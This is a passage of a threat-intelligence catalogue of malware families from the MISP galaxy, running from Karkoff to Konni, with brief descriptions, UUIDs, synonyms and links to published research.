which can be used as unique global reference for Karkoff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff - webarchive
- https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/ - webarchive
- https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-edgewater - webarchive
- https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/ - webarchive
- https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html - webarchive
- https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Karma
Ransomware.
Internal MISP references
UUID 2667c9a6-4811-4535-95a1-3b75ba853a03
which can be used as unique global reference for Karma
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.karma - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware - webarchive
- https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728 - webarchive
- https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/ - webarchive
- https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/ - webarchive
- https://www.youtube.com/watch?v=hgz5gZB3DxE - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KasperAgent
Internal MISP references
UUID d9c14095-8885-406c-b56b-06f3a1a88c1c
which can be used as unique global reference for KasperAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kasseika
Trend Micro describes this as ransomware with possible ties to BlackMatter.
Internal MISP references
UUID 5042b9a3-e0f1-4807-9e54-779e5de17beb
which can be used as unique global reference for Kasseika
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kazuar
Internal MISP references
UUID bab92070-3589-4b7e-bf05-4f54bfefc2ca
which can be used as unique global reference for Kazuar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://twitter.com/msftsecintel/status/1681695399084539908 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://youtu.be/SW8kVkwDOrc?t=24706 - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - webarchive
- https://cert.gov.ua/article/5213167 - webarchive
- https://unit42.paloaltonetworks.com/pensive-ursa-uses-upgraded-kazuar-backdoor/ - webarchive
- https://www.epicturla.com/blog/sysinturla - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/ - webarchive
- https://securelist.com/sunburst-backdoor-kazuar/99981/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KazyLoader
According to Karsten Hahn, KazyLoader is a straightforward loader that runs assemblies embedded in images.
Internal MISP references
UUID a6f86df6-d822-4143-bdfe-149e70bcf1a0
which can be used as unique global reference for KazyLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KDC Sponge
Internal MISP references
UUID 77c4a0e7-7ee1-446a-bc5d-8dd596d9d5fc
which can be used as unique global reference for KDC Sponge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kegotip
Internal MISP references
UUID 96bb088c-7bb7-4a07-a9d7-a3cbb45d5755
which can be used as unique global reference for Kegotip
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KEKW
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEKW.
Known Synonyms |
---|
KEKW-Locker |
Internal MISP references
UUID b178de96-14a3-49f1-a957-c83f86e23e83
which can be used as unique global reference for KEKW
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kelihos
Internal MISP references
UUID 7d69892e-d582-4545-8798-4a9a84a821ea
which can be used as unique global reference for Kelihos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos - webarchive
- https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/ - webarchive
- https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet - webarchive
- https://en.wikipedia.org/wiki/Kelihos_botnet - webarchive
- https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ - webarchive
- https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/ - webarchive
- https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/ - webarchive
- https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/ - webarchive
- https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf - webarchive
- https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kematian Stealer
Stealer written in Python, available as open source on Github.
Internal MISP references
UUID e03bdd1c-42cc-4483-ac2d-177ed62a0cf5
which can be used as unique global reference for Kematian Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kematian - webarchive
- https://www.linkedin.com/posts/threatmon_kematian-stealer-technical-malware-analysis-ugcPost-7219295620807696384-8bde?utm_source=share&utm_medium=member_desktop - webarchive
- https://labs.k7computing.com/index.php/kematian-stealer-forked-from-powershell-token-grabber/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Keona
Internal MISP references
UUID b74ad48b-ac26-4748-adac-b824defbe315
which can be used as unique global reference for Keona
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KerrDown
Internal MISP references
UUID bd9e21d1-7da3-4699-816f-0e368a63bc18
which can be used as unique global reference for KerrDown
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/ - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam - webarchive
- https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf - webarchive
- https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/ - webarchive
- https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7 - webarchive
- https://blog.cystack.net/word-based-malware-attack/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ketrican
Ketrican is a backdoor trojan used by APT15.
Internal MISP references
UUID 86cd2563-b343-4cce-ac2d-a17afbc77dfd
which can be used as unique global reference for Ketrican
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/ - webarchive
- https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/ - webarchive
- https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ketrum
Intezer found this family in mid-May 2020; it appears to be a merger of the Ketrican and Okrum families.
Internal MISP references
UUID 99d6cb80-bae2-4a97-8ec7-401f9570f237
which can be used as unique global reference for Ketrum
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KeyBase
KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KeyBase.
Known Synonyms |
---|
Kibex |
Internal MISP references
UUID 8a7bb20e-7e90-4330-8f53-744bd5519f6f
which can be used as unique global reference for KeyBase
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase - webarchive
- https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/ - webarchive
- https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/ - webarchive
- https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/ - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017 - webarchive
- https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/ - webarchive
- https://voidsec.com/keybase-en/ - webarchive
- https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KeyBoy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KeyBoy.
Known Synonyms |
---|
TSSL |
Internal MISP references
UUID 28c13455-7f95-40a5-9568-1e8732503507
which can be used as unique global reference for KeyBoy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy - webarchive
- https://citizenlab.ca/2016/11/parliament-keyboy/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-hobart - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html - webarchive
- https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Keyhole
According to Walmart Global Tech, Keyhole is a multi-functional VNC/Backconnect component used extensively by IcedID/Anubis. While the malware contains functionality that has been previously reported on as typical VNC and HDESK capabilities, a general lack of technical information appears to exist around some of the expanded functionality currently present.
Internal MISP references
UUID 283dcc47-975a-402c-9dd8-b2d5f7d9eee7
which can be used as unique global reference for Keyhole
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
APT3 Keylogger
Internal MISP references
UUID 68039fbe-2eee-4666-b809-32a011e9852a
which can be used as unique global reference for APT3 Keylogger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3 - webarchive
- https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/ - webarchive
- https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html - webarchive
- http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong - webarchive
- https://twitter.com/smoothimpact/status/773631684038107136 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KEYMARBLE
Internal MISP references
UUID 0c213d7f-8c71-4341-aeb0-13be71fbf4e5
which can be used as unique global reference for KEYMARBLE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR18-221A - webarchive
- https://research.checkpoint.com/north-korea-turns-against-russian-targets/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KGH_SPY
Internal MISP references
UUID d073b11a-a941-48b9-8e88-b59ffab9fcda
which can be used as unique global reference for KGH_SPY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Khonsari
A compact ransomware written in .NET and delivered as a follow-up to Log4j exploitation, targeting Windows servers.
Internal MISP references
UUID 76a7c43f-73d7-4f4f-acac-1fcaa150bf72
which can be used as unique global reference for Khonsari
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.khonsari - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://cloudsek.com/technical-analysis-of-khonsari-ransomware-campaign-exploiting-the-log4shell-vulnerability/ - webarchive
- https://www.cadosecurity.com/analysis-of-novel-khonsari-ransomware-deployed-by-the-log4shell-vulnerability/ - webarchive
- https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KHRAT
According to Unit42, KHRAT is a Trojan that registers victims using their infected machine's username, system language and local IP address. KHRAT provides the threat actors with typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.
Internal MISP references
UUID 361d3f09-8bc8-4b5a-803f-8686cf346047
which can be used as unique global reference for KHRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat - webarchive
- https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor - webarchive
- https://unit42.paloaltonetworks.com/atoms/rancortaurus/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/ - webarchive
- https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kikothac
Internal MISP references
UUID f2ca304f-6577-4f3a-983c-beec447a9493
which can be used as unique global reference for Kikothac
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KillAV
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KillAV.
Known Synonyms |
---|
BURNTCIGAR |
Internal MISP references
UUID ad6ac685-e13f-4522-9805-644f82818347
which can be used as unique global reference for KillAV
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.killav - webarchive
- https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/ - webarchive
- https://cyber.aon.com/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ - webarchive
- https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain/ - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ - webarchive
- https://www.mandiant.com/resources/unc2596-cuba-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KillDisk
KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many "sub-families", distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities are sometimes seen in separate cyberattacks and thus can help researchers make connections between them.
Internal MISP references
UUID e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027
which can be used as unique global reference for KillDisk
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KilllSomeOne
Internal MISP references
UUID 4d431d90-9dd5-4a77-9084-c010d6504f78
which can be used as unique global reference for KilllSomeOne
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KimJongRat
Internal MISP references
UUID 61edd17b-322d-45dc-a6a0-31c13ec2338e
which can be used as unique global reference for KimJongRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kimsuky
Internal MISP references
UUID 860643d6-5693-4e4e-ad1f-56c49faa10a7
which can be used as unique global reference for Kimsuky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky - webarchive
- https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign - webarchive
- https://asec.ahnlab.com/en/37396/ - webarchive
- https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9 - webarchive
- https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html - webarchive
- https://threatmon.io/unraveling-the-layers-analysis-of-kimsukys-multi-staged-cyberattack/ - webarchive
- https://asec.ahnlab.com/en/30532/ - webarchive
- https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/ - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/ - webarchive
- https://blog.alyac.co.kr/2347 - webarchive
- https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure - webarchive
- https://asec.ahnlab.com/en/53046/ - webarchive
- https://blog.prevailion.com/2019/09/autumn-aperture-report.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kingminer
According to Sophos, the botnet has been active since 2018. Initially, the botmasters operated DDoS tools and backdoors, but later moved on to cryptocurrency miners. They use a DGA to automatically change the hosting domains every week.
Internal MISP references
UUID 04d95343-fd44-471d-bfe7-908994a98ea7
which can be used as unique global reference for Kingminer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/354/Bitdefender-PR-Whitepaper-KingMiner-creat4610-en-EN-GenericUse.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/ - webarchive
- https://news.sophos.com/en-us/2020/06/09/kingminer-report/ - webarchive
- https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html - webarchive
- https://asec.ahnlab.com/en/32572/ - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KINS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KINS.
Known Synonyms |
---|
Kasper Internet Non-Security |
Maple |
Internal MISP references
UUID 07f6bbff-a09a-4580-96ea-62795a8dae11
which can be used as unique global reference for KINS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kins - webarchive
- https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html - webarchive
- https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/ - webarchive
- https://github.com/nyx0/KINS - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KIVARS (Windows)
Internal MISP references
UUID 6c585194-96d3-463d-ac21-aa942439cc26
which can be used as unique global reference for KIVARS (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt - webarchive
- https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Klackring
According to Microsoft, the threat actor ZINC uses Klackring as a payload dropped by ComeBacker; both were used in attacks targeting security researchers.
Internal MISP references
UUID 03a4eb90-8d88-49c7-a973-2201115ea5a8
which can be used as unique global reference for Klackring
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KleptoParasite Stealer
KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with an IP retriever module, an Outlook stealer (32-bit/64-bit) and a Chrome/Firefox stealer (32-bit/64-bit). Earlier versions come bundled (loader plus modules); newer versions come with a loader (167k) that fetches the modules.
PDB strings suggest a relationship to JogLog v6 and v7.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KleptoParasite Stealer.
Known Synonyms |
---|
Joglog |
Parasite |
Internal MISP references
UUID 618b6f23-fc83-4aff-8b0a-7f7138be625c
which can be used as unique global reference for KleptoParasite Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KlingonRAT
Internal MISP references
UUID 5f501884-2c72-4780-aaa6-c6b65e84fad8
which can be used as unique global reference for KlingonRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KLogEXE
Internal MISP references
UUID c71d0fcd-618d-49a5-a1e1-607e275a7ada
which can be used as unique global reference for KLogEXE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KLRD
Internal MISP references
UUID 70459959-5a20-482e-b714-2733f5ff310e
which can be used as unique global reference for KLRD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Knight
According to Symantec, this is a ransomware written in Golang and obfuscated with Gobfuscate. The source code for Knight (originally known as Cyclops) was offered for sale on underground forums in February 2024 after Knight’s developers decided to shut down their operation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Knight.
Known Synonyms |
---|
Cyclops |
Internal MISP references
UUID 1b251f88-4a9d-4edf-89d9-50c30d989a6f
which can be used as unique global reference for Knight
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Knot
Ransomware.
Internal MISP references
UUID 0479b7cd-982e-430e-a96e-338aec8ae3cf
which can be used as unique global reference for Knot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Koadic
Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and generates JScript and VBScript payloads that can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect targeted files based on their name or extension.
Internal MISP references
UUID 3b5faa15-e87e-4aaf-b791-2c5e593793e6
which can be used as unique global reference for Koadic
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic - webarchive
- http://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://github.com/zerosum0x0/koadic - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://blog.tofile.dev/2020/11/28/koadic_jarm.html - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ - webarchive
- https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Koi Loader
Internal MISP references
UUID 4163e613-40a0-4ca5-8ed2-2f014eb64bb3
which can be used as unique global reference for Koi Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Koi Stealer
Internal MISP references
UUID 9f6e745e-086b-4126-bc21-6e2a83115ddc
which can be used as unique global reference for Koi Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KoiVM
KoiVM is a virtualization-based obfuscator for .NET assemblies that is used to protect .NET loaders.
Internal MISP references
UUID 4b7c6af1-1980-452f-9405-e42d0066ff2d
which can be used as unique global reference for KoiVM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KokoKrypt
Internal MISP references
UUID f7674d06-450a-4150-9180-afef94cce53c
which can be used as unique global reference for KokoKrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KOMPROGO
KOMPROGO is a signature backdoor used by APT32. It is capable of process, file and registry management, creating a reverse shell, running WMI queries, and retrieving information about the infected system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KOMPROGO.
Known Synonyms |
---|
Splinter RAT |
Internal MISP references
UUID 116f4c5f-fd51-4e90-995b-f16c46523c06
which can be used as unique global reference for KOMPROGO
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo - webarchive
- https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99 - webarchive
- https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Konni (Windows)
Konni is a remote administration tool observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North Korean cyber espionage group active since 2012. The group's primary victims are South Korean political organizations, along with targets in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait and other parts of the Middle East.
Internal MISP references
UUID f982fa2d-f78f-4fe1-a86d-d10471a3ebcf
which can be used as unique global reference for Konni (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.konni - webarchive
- https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/ - webarchive
- https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ - webarchive
